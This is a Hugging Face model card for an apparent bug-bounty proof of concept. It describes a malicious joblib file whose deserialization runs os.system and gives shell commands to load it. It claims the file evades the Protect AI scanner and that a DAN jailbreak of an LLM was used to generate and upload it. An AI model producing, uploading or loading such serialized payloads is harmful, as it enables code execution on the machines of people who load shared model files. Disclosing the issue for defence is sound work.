Hugging Face's logo

an0n3
/
joblib-rce-poc

Joblib
Model card Files
xet
 Community
joblib-rce-poc / README.md
an0n3's picture
an0n3
Upload README.md with huggingface_hub
d0b4003 verified
preview code
|
raw
history blame contribute delete
688 Bytes

Joblib Deserialization RCE PoC

Verification (Terminal Output)

$ python3 -c "import joblib; result=joblib.load('exploit.joblib'); print('✅ Functional:', result)" ✅ Functional: 256

Bounty Repro 

pip install joblib
python3 -c "import joblib; joblib.load('exploit.joblib')"
# Returns 256 = os.system success (RCE confirmed)

Discovery
Garak LLM Testing: dan.DAN_Jailbreak vs mitigation.MitigationBypass
Success Rate: 100% (marathon confirmed)
Scanner Evasion: Protect AI bypassed (embedded serialization payload)
Huntr Impact
CVSS: 9.8 (Remote Code Execution)
Attack Vector: LLM generates + uploads malicious .joblib files
Mitigation: Reject LLM-generated model weights